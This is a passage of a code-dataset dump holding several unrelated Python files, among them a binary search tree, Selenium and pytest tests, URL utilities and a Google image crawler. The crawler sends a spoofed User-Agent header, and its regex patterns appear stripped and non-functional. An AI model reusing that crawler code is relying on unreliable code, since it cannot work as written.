print(\"Error found: %s, type: %s\" % (e, type(e)))\n\n return redirect(\"/\")\n\ndef get_simplified_medication_json(medications):\n medication_json = []\n for medication in medications:\n json = {}\n json['instructions'] = medication.instructions\n json['presentation'] = medication.presentation\n medication_json.append(json)\n return medication_json[::-1] # This 'pythonesque' code reverts order of lists\n\n","sub_path":"prescryptchain/blockchain/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"512310050","text":"from time import sleep\n\nimport pytest\n\n\n@pytest.mark.django_db\n@pytest.mark.slow\n@pytest.mark.parametrize(\"uri\", ['/users/profiles/', ])\nclass TestUserProfiles:\n def test_page_and_submit(\n self, uri, live_server, browser_in, users, driver_wait_time\n ):\n # load page\n browser_in.get(live_server + uri)\n assert uri in browser_in.current_url\n # check table is there\n sleep(driver_wait_time)\n tables = browser_in.find_elements_by_class_name('table')\n assert len(tables) == 1\n table = tables[0]\n assert 'Approved' in table.text\n assert 'Incoming' in table.text\n assert 'test@example.com' in table.text\n # toggle a permission\n toggle_button = browser_in.find_elements_by_class_name('minus')[0]\n toggle_button.click()\n assert users['staff'].profile.approved\n","sub_path":"tests/functional_tests/apostello/test_user_profiles.py","file_name":"test_user_profiles.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"391286274","text":"## {{{ http://code.activestate.com/recipes/577540/ (r2)\n\"\"\"\nBinary Search Tree: A sorted collection of values that supports\nefficient insertion, deletion, and minimum/maximum value finding.\n\"\"\"\n# Copyright (C) 2008 by Edward Loper\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\n# IMPLEMENTATION NOTES:\n#\n# Internally, we represent tree nodes using Python lists. These lists\n# may either be empty (for empty nodes) or may have length four (for\n# non-empty nodes). The non-empty nodes contain:\n#\n# [left_child, right_child, value, sort_key]\n#\n# Using lists rather than a node class more than doubles the overall\n# performance in the benchmarks that I have run.\n#\n# The sort key is always accessed as node[-1]. 
This allows us to\n# optimize the case where the sort key is identical to the value, by\n# encoding such nodes as simply:\n#\n#    [left_child, right_child, value]\n#\n# The following constants are used to access the pieces of each search\n# node.  If the constant-binding optimization recipe (which can be\n# downloaded from the ActiveState recipes site) is\n# available, then it is used to replace these constants at\n# import-time, increasing the binary search tree efficiency by 3-5%.\n_LEFT = 'left'\n_RIGHT = 'right'\n\nclass Node(object):\n    '''The BST node structure. It uses slots to keep the memory usage the same\n    or better than a list. The sort_key is a lazily evaluated property.\n    '''\n    __slots__ = ('right', 'left', 'value', '_sort_key')\n    def __init__(self, value, sort_key = None, right = None, left = None):\n        self.value = value\n        if sort_key is not None:\n            self._sort_key = sort_key\n        self.right = right\n        self.left = left\n    @property\n    def sort_key(self):\n        ''' Property method, returns sort_key if it exists, else\n        returns the value.'''\n        if hasattr(self, '_sort_key'):\n            return self._sort_key\n        return self.value\n    \nclass BinarySearchTree(object):\n    \"\"\"\n    A sorted collection of values that supports efficient insertion,\n    deletion, and minimum/maximum value finding.  Values may be sorted\n    either based on their own value, or based on a key value whose\n    value is computed by a key function (specified as an argument to\n    the constructor).\n\n    BinarySearchTree allows duplicates -- i.e., a BinarySearchTree may\n    contain multiple values that are equal to one another (or multiple\n    values with the same key).  The ordering of equal values, or\n    values with equal keys, is undefined.\n    \"\"\"\n    def __init__(self, values = None, sort_key=None):\n        \"\"\"\n        Create a new BST.  If a sort key is specified, then it\n        will be used to define the sort order for the BST.  If an\n        explicit sort key is not specified, then each value is\n        considered its own sort key.  Any values passed in are\n        inserted immediately.\n        \"\"\"\n        self._root = None\n        self._sort_key = sort_key\n        self._len = 0\n        if values:\n            for elem in values:\n                self.insert(elem)\n\n    #/////////////////////////////////////////////////////////////////\n    # Public Methods\n    #/////////////////////////////////////////////////////////////////\n    \n    def insert(self, value):\n        \"\"\"\n        Insert the specified value into the BST.\n        \"\"\"\n        \n        # Get the sort key for this value.\n        if self._sort_key is None:\n            new_node = Node(value)\n        else:\n            new_node = Node(value, self._sort_key(value))\n        # Walk down the tree until we find the empty slot where the new\n        # node belongs (equal keys go to the right).\n        if self._root is None:\n            self._root = new_node\n        node = self._root\n        while node is not new_node:\n            if new_node.sort_key < node.sort_key:\n                if node.left is None:\n                    node.left = new_node\n                node = node.left\n            else:\n                if node.right is None:\n                    node.right = new_node\n                node = node.right\n        self._len += 1\n    \n    def minimum(self):\n        \"\"\"\n        Return the value with the minimum sort key.  If multiple\n        values have the same (minimum) sort key, then it is undefined\n        which one will be returned.\n        \"\"\"\n        return self._extreme_node(_LEFT).value\n    \n    def maximum(self):\n        \"\"\"\n        Return the value with the maximum sort key.  If multiple values\n        have the same (maximum) sort key, then it is undefined which one\n        will be returned.\n        \"\"\"\n        return self._extreme_node(_RIGHT).value\n\n    def find(self, sort_key):\n        \"\"\"\n        Find a value with the given sort key, and return it. 
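A minimal lookup sketch (doctest-style):\n\n            >>> bst = BinarySearchTree([3, 1, 2])\n            >>> bst.find(2)\n            2\n\n        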
If no such\n        value is found, then raise a KeyError.\n        \"\"\"\n        return self._find(sort_key).value\n    \n    def pop_min(self):\n        \"\"\"\n        Return the value with the minimum sort key, and remove that value\n        from the BST.  If multiple values have the same (minimum) sort key,\n        then it is undefined which one will be returned.\n        \"\"\"\n        return self._pop_node(self._extreme_node(_LEFT))\n    \n    def pop_max(self):\n        \"\"\"\n        Return the value with the maximum sort key, and remove that value\n        from the BST.  If multiple values have the same (maximum) sort key,\n        then it is undefined which one will be returned.\n        \"\"\"\n        return self._pop_node(self._extreme_node(_RIGHT))\n\n    def pop(self, sort_key):\n        \"\"\"\n        Find a value with the given sort key, remove it from the BST, and\n        return it.  If multiple values have the same sort key, then it is\n        undefined which one will be returned.  If no value has the\n        specified sort key, then raise a KeyError.\n        \"\"\"\n        return self._pop_node(self._find(sort_key))\n\n    def values(self, reverse=False):\n        \"\"\"Generate the values in this BST in sorted order.\"\"\"\n        if reverse:\n            return self._iter(_RIGHT, _LEFT)\n        else:\n            return self._iter(_LEFT, _RIGHT)\n    __iter__ = values\n\n    def __len__(self):\n        \"\"\"Return the number of items in this BST\"\"\"\n        return self._len\n\n    def __nonzero__(self):\n        \"\"\"Return true if this BST is not empty\"\"\"\n        return self._len > 0\n\n    def __repr__(self):\n        return '<BST: (%s)>' % ', '.join('%r' % v for v in self)\n\n    def __str__(self):\n        return self.pprint()\n\n    def pprint(self, max_depth=10, frame=True, show_key=True):\n        \"\"\"\n        Return a pretty-printed string representation of this binary\n        search tree.\n        \"\"\"\n        top, mid, bot = self._pprint(self._root, max_depth, show_key)\n        lines = top + [mid] + bot\n        if frame:\n            width = max(40, max(len(line) for line in lines))\n            sout = '+-'+'MIN'.rjust(width, '-')+'-+\\n'\n            sout += ''.join('| %s |\\n' % line.ljust(width) for line in lines)\n            sout += '+-'+'MAX'.rjust(width, '-')+'-+\\n'\n            return sout\n        else:\n            return '\\n'.join(lines)\n\n    #/////////////////////////////////////////////////////////////////\n    # Private Helper Methods\n    #/////////////////////////////////////////////////////////////////\n    \n    def _extreme_node(self, side):\n        \"\"\"\n        Return the leaf node found by descending the given side of the\n        BST (either _LEFT or _RIGHT).\n        \"\"\"\n        if self._root is None:\n            raise IndexError('Empty Binary Search Tree!')\n        node = self._root\n        # Walk down the specified side of the tree.\n        while getattr(node, side) is not None:\n            node = getattr(node, side)\n        return node\n\n    def _find(self, sort_key):\n        \"\"\"\n        Return a node with the given sort key, or raise KeyError if not found.\n        \"\"\"\n        node = self._root\n        while node:\n            node_key = node.sort_key\n            if sort_key < node_key:\n                node = node.left\n            elif sort_key > node_key:\n                node = node.right\n            else:\n                return node\n        raise KeyError(\"Key %r not found in BST\" % sort_key)\n\n    def _pop_node(self, node):\n        \"\"\"\n        Delete the given node, and return its value.\n        \"\"\"\n        value = node.value\n        if node.left and node.right:\n            # This node has a left child and a right child; find the\n            # node's successor (the leftmost node of its right subtree,\n            # which is guaranteed not to have a left child), move the\n            # successor's value into this node, and splice the successor\n            # out of the tree.  Note: the successor may not carry an\n            # explicit _sort_key because of the key-equal-to-value\n            # optimization; so we have to be a little careful here.\n            parent, successor = node, node.right\n            while successor.left:\n                parent, successor = successor, successor.left\n            node.value = successor.value\n            if hasattr(successor, '_sort_key'):\n                node._sort_key = successor._sort_key\n            elif hasattr(node, '_sort_key'):\n                del node._sort_key\n            if parent.left is successor:\n                parent.left = successor.right\n            else:\n                parent.right = successor.right\n        else:\n            # This node has at most one child; relink the node's parent\n            # (or the root reference) straight to that child, which may\n            # be None when the node is a leaf.\n            child = node.left or node.right\n            if node is self._root:\n                self._root = child\n            else:\n                # Equal keys always go right on insertion, so this key\n                # walk is guaranteed to reach the node being removed.\n                parent = self._root\n                while parent.left is not node and parent.right is not node:\n                    if node.sort_key < parent.sort_key:\n                        parent = parent.left\n                    else:\n                        parent = parent.right\n                if parent.left is node:\n                    parent.left = child\n                else:\n                    parent.right = child\n        self._len -= 1\n        return value\n\n    def _iter(self, pre, post):\n        '''Helper for sorted iterators.\n        - If (pre,post) = (_LEFT,_RIGHT), then this will generate items\n          in sorted order.\n        - If (pre,post) = (_RIGHT,_LEFT), then this will generate items\n          in reverse-sorted order.\n        We use an iterative implementation (rather than the recursive one)\n        for efficiency.\n        '''\n        stack = []\n        node = self._root\n        while stack or node:\n            if node: # descending the tree\n                stack.append(node)\n                node = getattr(node, pre)\n            else: # ascending the tree\n                node = stack.pop()\n                yield node.value\n                node = getattr(node, post)\n\n    def _pprint(self, node, max_depth, show_key, spacer=2):\n        \"\"\"\n        Returns a (top_lines, mid_line, bot_lines) tuple.\n        \"\"\"\n        if max_depth == 0:\n            return ([], '- ...', [])\n        elif not node:\n            return ([], '- EMPTY', [])\n        else:\n            top_lines = []\n            bot_lines = []\n            mid_line = '-%r' % node.value\n            if show_key and hasattr(node, '_sort_key'):\n                mid_line += ' (key=%r)' % node.sort_key\n            if node.left:\n                top, mid, bot = self._pprint(node.left, max_depth-1,\n                                          show_key, spacer)\n                indent = ' '*(len(bot)+spacer)\n                top_lines += [indent+' '+line for line in top]\n                top_lines.append(indent+'/'+mid)\n                top_lines += [' '*(len(bot)-i+spacer-1)+'/'+' '*(i+1)+line\n                              for (i, line) in enumerate(bot)]\n            if node.right:\n                top, mid, bot = self._pprint(node.right, max_depth-1,\n                                          show_key, spacer)\n                indent = ' '*(len(top)+spacer)\n                bot_lines += [' '*(i+spacer) + '\\\\' + ' ' * (len(top)-i) + line\n                              for (i, line) in enumerate(top)]\n                bot_lines.append(indent+'\\\\'+mid)\n                bot_lines += [indent+' '+line for line in bot]\n            return (top_lines, mid_line, bot_lines)\n\ntry:\n    # Try to use the constant-binding recipe from the ActiveState\n    # cookbook.  This will only work if that recipe has been saved as\n    # \"optimize_constants.py\".\n    from optimize_constants import bind_all\n    bind_all(BinarySearchTree)\nexcept ImportError:\n    pass\n## end of http://code.activestate.com/recipes/577540/ }}}\n\n","sub_path":"binarysearchtree.py","file_name":"binarysearchtree.py","file_ext":"py","file_size_in_byte":13042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"170874615","text":"from itsim.software.context import Context\nfrom itsim.machine.node import Node\nfrom itsim.machine.process_management.process import Process\nfrom itsim.machine.process_management.thread import Thread, ThreadKilled\nfrom itsim.simulator import Simulator, advance\nfrom itsim.types import Timeout\nfrom itsim.utils import assert_list\n\nfrom pytest import fixture, fail\nfrom unittest.mock import patch\n\n\n@fixture\n@patch(\"itsim.machine.node.Node\")\ndef proc_a(mock_node):\n    return Process(0, mock_node)\n\n\n@fixture\n@patch(\"itsim.machine.node.Node\")\ndef proc_b(mock_node):\n    return Process(1, mock_node)\n\n\n@fixture\n@patch(\"itsim.machine.process_management.process.Process\")\ndef thread(mock_proc):\n    return Thread(Simulator(), mock_proc, 
0)\n\n\n@patch(\"itsim.machine.node.Node\")\ndef test_init(mock_node):\n n = 0\n parent = Process(n, mock_node)\n proc = Process(n, mock_node, parent)\n assert_list([\n set() == proc._children,\n parent == proc._parent,\n set() == proc._threads,\n n == proc._n,\n mock_node == proc._node,\n 0 == proc._thread_counter],\n throw=True)\n\n\n@patch(\"itsim.machine.node.Node\")\ndef test_eq(mock_node, proc_a, proc_b):\n assert proc_a == proc_a\n\n n = 0\n assert Process(n, mock_node, proc_a) == Process(n, mock_node, proc_a)\n\n assert_list([\n Process(n, mock_node, proc_a) != Process(1, mock_node, proc_a),\n Process(n, mock_node, proc_a) != Process(n, Node(), proc_a)],\n throw=True)\n\n\n@patch(\"itsim.machine.node.Node\")\ndef test_hash(mock_node, proc_a, proc_b):\n assert hash(proc_a) == hash(proc_a)\n\n n = 0\n assert hash(Process(n, mock_node, proc_a)) == hash(Process(n, mock_node, proc_a))\n\n assert_list([\n hash(Process(n, mock_node, proc_a)) != hash(Process(1, mock_node, proc_a)),\n hash(Process(n, mock_node, proc_a)) != hash(Process(n, Node(), proc_a))],\n throw=True)\n\n\n@patch(\"itsim.simulator.Simulator\")\ndef test_exc_in(mock_sim, proc_a):\n time = 10\n\n t_a = proc_a.exc_in(mock_sim, time, lambda: 0)\n\n assert set([t_a]) == proc_a._threads\n assert 1 == proc_a._thread_counter\n\n t_b = proc_a.exc_in(mock_sim, time, lambda: 0)\n assert set([t_a, t_b]) == proc_a._threads\n assert 2 == proc_a._thread_counter\n\n\n@patch(\"itsim.simulator.Simulator\")\ndef test_exc(mock_sim, proc_a):\n t_a = proc_a.exc(mock_sim, lambda: 0)\n assert set([t_a]) == proc_a._threads\n assert 1 == proc_a._thread_counter\n\n t_b = proc_a.exc(mock_sim, lambda: 0)\n assert set([t_a, t_b]) == proc_a._threads\n assert 2 == proc_a._thread_counter\n\n\n@patch(\"itsim.simulator.Simulator\")\n@patch(\"itsim.machine.node.Node\")\n@patch(\"itsim.machine.process_management.process.Process\")\ndef test_thread_complete(mock_sim, mock_node, mock_proc):\n proc = Process(0, mock_node, mock_proc)\n t_a = proc.exc(mock_sim, lambda: 0)\n\n proc.thread_complete(t_a)\n assert set([]) == proc._threads\n assert 1 == proc._thread_counter\n mock_proc.child_complete.assert_called_with(proc)\n mock_node.proc_exit.assert_called_with(proc)\n\n\n@patch(\"itsim.machine.node.Node\")\ndef test_parent_child_relationship(mock_node):\n parent = Process(0, mock_node)\n kid = Process(1, mock_node, parent)\n assert parent._parent is None\n assert kid._parent is parent\n assert parent._children == {kid}\n assert len(kid._children) == 0\n\n\n@patch(\"itsim.machine.node.Node\")\ndef test_fork_exec(mock_node):\n proc = Process(0, mock_node)\n sim = Simulator()\n proc.exc(sim, lambda: None)\n\n def f():\n pass\n\n kid = proc.fork_exec(f)\n mock_node.run_proc_in.assert_called_with(sim, 0, f)\n assert proc == kid._parent\n assert {kid} == proc._children\n\n\n@patch(\"itsim.machine.node.Node\")\ndef test_fork_exec_args(mock_node):\n proc = Process(0, mock_node)\n sim = Simulator()\n proc.exc(sim, lambda: None)\n\n def f():\n pass\n\n args = (1, 2, 3)\n kwargs = {\"a\": 0, \"b\": 1}\n kid = proc.fork_exec(f, *args, **kwargs)\n mock_node.run_proc_in.assert_called_with(sim, 0, f, *args, **kwargs)\n assert proc == kid._parent\n assert {kid} == proc._children\n\n\n@patch(\"itsim.machine.node.Node\")\ndef test_child_complete(mock_node):\n parent = Process(0, mock_node)\n parent.exc(Simulator(), lambda: 0)\n kid = parent.fork_exec(lambda: 0)\n parent.child_complete(kid)\n assert set() == parent._children\n\n\ndef run_process_wait_test(timeout, expected, 
has_thread=True, delay_before_wait=0):\n with patch(\"itsim.machine.node.Node\") as mock_node:\n def thread_behaviour(context: Context):\n advance(10)\n\n sim = Simulator()\n proc = Process(1234, mock_node)\n if has_thread:\n proc.exc(sim, thread_behaviour)\n log = []\n\n def wait_for_proc():\n advance(delay_before_wait)\n try:\n proc.wait(timeout)\n log.append(\"complete\")\n except Timeout:\n log.append(\"timeout\")\n\n sim.add(wait_for_proc)\n sim.run()\n\n assert log == [expected]\n\n\ndef test_process_wait_no_more_thread():\n run_process_wait_test(None, \"complete\", True, 20)\n\n\ndef test_process_wait_complete_no_timeout():\n run_process_wait_test(None, \"complete\")\n\n\ndef test_process_wait_complete_with_timeout():\n run_process_wait_test(20, \"complete\")\n\n\ndef test_process_wait_timeout():\n run_process_wait_test(5, \"timeout\")\n\n\ndef test_process_wait_no_thread_not_started():\n run_process_wait_test(100, \"timeout\", False)\n\n\n@patch(\"itsim.machine.node.Node\")\ndef test_process_is_alive(mock_node):\n DELAY = 20\n is_running = False\n\n def f(_):\n nonlocal is_running\n is_running = True\n advance(DELAY)\n\n sim = Simulator()\n proc = Process(1234, mock_node)\n assert proc.is_alive()\n thread = Thread(sim, proc, 0)\n assert proc.is_alive()\n thread.run(f)\n assert proc.is_alive()\n sim.run(DELAY / 2)\n assert is_running\n assert proc.is_alive()\n sim.run()\n assert not proc.is_alive()\n\n\ndef run_test_kill(delays_threads, delay_kill, delay_join, expect_alive_after_kill):\n with patch(\"itsim.machine.node.Node\") as mock_node:\n log = []\n\n def f(_, delay):\n try:\n advance(delay)\n except ThreadKilled:\n raise\n except Exception:\n fail(\"Thread ended with other interrupt than ThreadKilled.\")\n\n def waiter(p):\n advance(delay_join)\n p.wait()\n for thread in p._threads:\n assert not thread.is_alive()\n assert not p.is_alive()\n log.append(\"waiter\")\n\n def killer(p):\n advance(delay_kill)\n p.kill()\n assert p.is_alive() == expect_alive_after_kill\n log.append(\"killer\")\n\n sim = Simulator()\n proc = Process(1234, mock_node)\n for delay in delays_threads:\n proc.exc(sim, f, delay)\n sim.add(waiter, proc)\n sim.add(killer, proc)\n sim.run()\n assert log == [\"killer\", \"waiter\"]\n\n\ndef test_kill_no_thread():\n run_test_kill([], 10, 11, False)\n\n\ndef test_kill_dead():\n run_test_kill([10], 20, 30, False)\n\n\ndef test_kill_live_trigger_wait():\n run_test_kill([100], 10, 0, True)\n\n\ndef test_kill_live_two_threads():\n run_test_kill([100, 200], 10, 0, True)\n\n\ndef test_kill_live_one_thread_done():\n run_test_kill([10, 200], 20, 0, True)\n\n\ndef test_kill_live_wait_after():\n run_test_kill([100], 10, 20, True)\n","sub_path":"tests/machine/process_management/test_process.py","file_name":"test_process.py","file_ext":"py","file_size_in_byte":7490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"325009005","text":"import os\r\nimport logging\r\nfrom hashlib import sha256\r\nfrom urllib.parse import urlparse\r\n\r\nclass UrlInfo(object):\r\n def __init__(self, url, completed = False, wordCount = 0):\r\n self.url = url\r\n self.completed = completed\r\n self.wordCount = wordCount\r\n \r\ndef get_logger(name, filename=None):\r\n logger = logging.getLogger(name)\r\n logger.setLevel(logging.INFO)\r\n if not os.path.exists(\"Logs\"):\r\n os.makedirs(\"Logs\")\r\n fh = logging.FileHandler(f\"Logs/{filename if filename else name}.log\")\r\n fh.setLevel(logging.DEBUG)\r\n ch = logging.StreamHandler()\r\n 
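# echo log records to the console in addition to the per-name log file\r\n    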
ch.setLevel(logging.INFO)\r\n    formatter = logging.Formatter(\r\n        \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\r\n    fh.setFormatter(formatter)\r\n    ch.setFormatter(formatter)\r\n    # add the handlers to the logger\r\n    logger.addHandler(fh)\r\n    logger.addHandler(ch)\r\n    return logger\r\n\r\n\r\ndef get_urlhash(url):\r\n    parsed = urlparse(url)\r\n    # everything other than scheme.\r\n    return sha256(\r\n        f\"{parsed.netloc}/{parsed.path}/{parsed.params}/\"\r\n        f\"{parsed.query}/{parsed.fragment}\".encode(\"utf-8\")).hexdigest()\r\n\r\ndef normalize(url):\r\n    # trim out url fragment\r\n    parts = url.rsplit('/', 1)\r\n    if len(parts) == 2:\r\n        left, right = parts\r\n        posi = right.find('#')\r\n\r\n        # # trim query ??\r\n        # posi1 = right.find('?', 0, posi)\r\n        # if posi1 != -1 and posi1 < posi:\r\n        #     posi = posi1\r\n\r\n        if posi != -1:\r\n            url = left + '/' + right[:posi]\r\n    \r\n    if url.endswith(\"/\"):\r\n        return url.rstrip(\"/\")\r\n    return url","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"278755918","text":"import os\r\nimport sys\r\nimport re\r\nimport requests\r\nimport time\r\n\r\ndef my_fetch(url, follow):\r\n\tif follow:\r\n\t\theaders = {\r\n\t\t\t'User-Agent': 'Mozilla/4.0 (compatible; MSIE5.01; Windows NT 5.0)',\r\n\t\t\t'referer': 'http://www.google.com/'\r\n\t\t}\r\n\t\trequest = requests.get(url, headers=headers, allow_redirects=True)\r\n\telse:\r\n\t\trequest = requests.get(url)\r\n\ttime.sleep(.1)\r\n\treturn request.text\r\n\r\ndef get_images_url(request, language):\r\n\tsubject = my_fetch('http://www.google.com/search?hl='+language+'&q='+request, False)\r\n\tpattern = 'Images'\r\n\tmatches = re.search(pattern, subject)\r\n\treturn (matches.group(1))\r\n\r\ndef get_images(request, language):\r\n\timages_url = get_images_url(request, language)\r\n\tsubject = my_fetch(images_url, True)\r\n\tpattern = '(.*?)<\\/table>'\r\n\tmatches = re.search(pattern, subject)\r\n\tsubject = matches.group(0)\r\n\tpattern = ''\r\n\tmatches = re.findall(pattern, subject)\r\n\treturn (matches)\r\n\r\ndef setup_personality(directory, name):\r\n\tfolder = directory\r\n\tif not os.path.exists(folder):\r\n\t\tos.makedirs(folder)\r\n\tfolder += '/'+name\r\n\tif not os.path.exists(folder):\r\n\t\tos.makedirs(folder)\r\n\treturn (folder)\r\n\r\ndef add_personality_extra(directory, name, language, extra):\r\n\tfolder = setup_personality(directory, name)\r\n\tfd = open(folder+'/urls.txt', 'w')\r\n\tif extra:\r\n\t\turls = get_images('\"'+name+'\" '+extra, language)\r\n\telse:\r\n\t\turls = get_images('\"'+name+'\"', language)\r\n\ti = 0\r\n\tfor url in urls:\r\n\t\timage_fd = open(folder+'/image_'+str(i)+'.jpg', 'wb')\r\n\t\tfd.write(url+'\\n')\r\n\t\tr = requests.get(url)\r\n\t\tif r.status_code == 200:\r\n\t\t\tfor chunk in r:\r\n\t\t\t\timage_fd.write(chunk)\r\n\t\timage_fd.close()\r\n\t\ti += 1\r\n\tfd.close()\r\n\r\ndef add_personality(directory, name, language):\r\n\tadd_personality_extra(directory, name, language, False)\r\n\r\nif __name__ == '__main__':\r\n\tadd_personality(sys.argv[1], sys.argv[2], sys.argv[3])\r\n","sub_path":"scripts/scripts/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"186114322","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom 
selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\nclass ProcessadorDeFluxos():\n\n\t@staticmethod\n\tdef run(fluxo, parametros):\n\n\t\tchrome_options = Options()\n\t\tchrome_options.add_argument('--headless')\n\n\t\tdriver = webdriver.Chrome(chrome_options=chrome_options)\n\n\t\tsaida = None\n\t\tdriver.get(fluxo.url_inicial)\n\t\tindice = 0\n\t\tacoes = fluxo.acoes.all()\n\t\tfor acao in acoes:\n\t\t\telement = driver.find_element_by_xpath(acao.xpath)\n\t\t\tif acao.tipo == 'input':\n\t\t\t\telement.send_keys(parametros[indice])\n\t\t\t\tindice = indice + 1\n\t\t\tif acao.tipo == 'button':\n\t\t\t\telement.click()\n\t\t\tif acao.tipo == 'select':\n\t\t\t\tmen_menu = WebDriverWait(driver, 10).until(EC.visibility_of_element_located((By.XPATH, acao.xpath)))\n\t\t\t\tActionChains(driver).move_to_element(men_menu).perform()\n\t\t\tif acao.tipo == 'output':\n\t\t\t\tsaida = element.get_attribute('innerHTML')\n\n\t\t# driver.save_screenshot('image.png')\n\t\tdriver.close()\n\t\treturn saida\n\n\n\n\n\n","sub_path":"actuators/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"60891354","text":"# -*- coding: utf-8 -*-\nimport click\nimport os\nimport pytest\nimport subprocess\nimport tempfile\nimport zazu.util\ntry:\n    import __builtin__ as builtins  # NOQA\nexcept ImportError:\n    import builtins  # NOQA\n\n__author__ = \"Nicholas Wiles\"\n__copyright__ = \"Copyright 2016\"\n\n\ndef touch_file(path):\n    with open(path, 'w'):\n        pass\n\n\ndef test_scan_tree():\n    dir = tempfile.mkdtemp()\n    exclude_dir = os.path.join(dir, 'exclude')\n    os.mkdir(exclude_dir)\n    exclude_file = os.path.join(exclude_dir, 'excluded_file.yes')\n    include_file = os.path.join(dir, 'file.yes')\n    extra_file = os.path.join(dir, 'file.no')\n    touch_file(exclude_file)\n    touch_file(extra_file)\n    results = zazu.util.scantree(dir, ['*.yes'], ['exclude'], exclude_hidden=True)\n    assert not results\n    touch_file(include_file)\n    results = zazu.util.scantree(dir, ['*.yes'], ['exclude'], exclude_hidden=True)\n    assert len(results) == 1\n    assert os.path.relpath(include_file, dir) in results\n\n\ndef test_check_output(mocker):\n    mocker.patch('subprocess.check_output', side_effect=OSError(''))\n    with pytest.raises(click.ClickException):\n        zazu.util.check_output(['foo'])\n    subprocess.check_output.assert_called_once_with(['foo'])\n\n\ndef test_call(mocker):\n    mocker.patch('subprocess.call', side_effect=OSError(''))\n    with pytest.raises(click.ClickException):\n        zazu.util.call(['foo'])\n    subprocess.call.assert_called_once_with(['foo'])\n\n\ndef test_check_popen_not_found(mocker):\n    mocker.patch('subprocess.Popen', side_effect=OSError(''))\n    with pytest.raises(click.ClickException):\n        zazu.util.check_popen(['foo'])\n    subprocess.call.assert_called_once_with(['foo'])\n\n\ndef test_check_popen(mocker):\n    mocked_process = mocker.Mock()\n    mocked_process.communicate = mocker.Mock(return_value=('out', 'err'))\n    mocker.patch('subprocess.Popen', return_value=mocked_process)\n    mocked_process.returncode = 0\n    assert 'out' == zazu.util.check_popen(stdin_str='input', args=['foo'])\n    subprocess.Popen.assert_called_once_with(args=['foo'], stderr=subprocess.PIPE,\n                                             stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n    
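# the stdin payload must be handed to communicate() exactly once\n    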
mocked_process.communicate.assert_called_once_with('input')\n with pytest.raises(subprocess.CalledProcessError) as e:\n mocked_process.returncode = 1\n zazu.util.check_popen(stdin_str='input', args=['foo'])\n assert e.value.returncode == 1\n assert e.value.cmd == ['foo']\n assert e.value.output == 'err'\n\n\ndef call(*args, **kwargs):\n try:\n return subprocess.call(*args, **kwargs)\n except OSError:\n raise_uninstalled(args[0][0])\n\n\ndef test_pprint_list():\n list = ['a', 'b', 'c']\n formatted = zazu.util.pprint_list(list)\n expected = '\\n - a\\n - b\\n - c'\n assert expected == formatted\n\n\ndef test_raise_uninstalled():\n with pytest.raises(click.ClickException):\n zazu.util.raise_uninstalled('foo')\n\n\ndef test_prompt_default(monkeypatch):\n monkeypatch.setattr('builtins.input', lambda x: '')\n expected = 'bar'\n assert zazu.util.prompt('foo', expected) == expected\n\n\ndef test_prompt_overide_default(monkeypatch):\n expected2 = 'baz'\n monkeypatch.setattr('builtins.input', lambda x: expected2)\n assert zazu.util.prompt('foo', 'bar') == expected2\n\n\ndef test_prompt(monkeypatch):\n expected2 = 'baz'\n monkeypatch.setattr('builtins.input', lambda x: expected2)\n assert zazu.util.prompt('foo') == expected2\n with pytest.raises(ValueError):\n zazu.util.prompt('foo', expected_type=int)\n\n\ndef test_pick_empty():\n assert zazu.util.pick([], 'foo') is None\n\n\ndef test_pick_single():\n choices = ['one']\n assert zazu.util.pick(choices, 'foo') == choices[0]\n\n\ndef test_pick(monkeypatch):\n choices = ['one', 'two']\n monkeypatch.setattr('inquirer.prompt', lambda x: {' ': choices[0]})\n assert zazu.util.pick(choices, 'foo') == choices[0]\n\n\ndef test_pick_interupted(monkeypatch):\n choices = ['one', 'two']\n monkeypatch.setattr('inquirer.prompt', lambda x: None)\n with pytest.raises(KeyboardInterrupt):\n zazu.util.pick(choices, 'foo')\n","sub_path":"tests/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"27715108","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nstartTime = datetime.now()\ndef jobdesc(givenUrl,session):\n 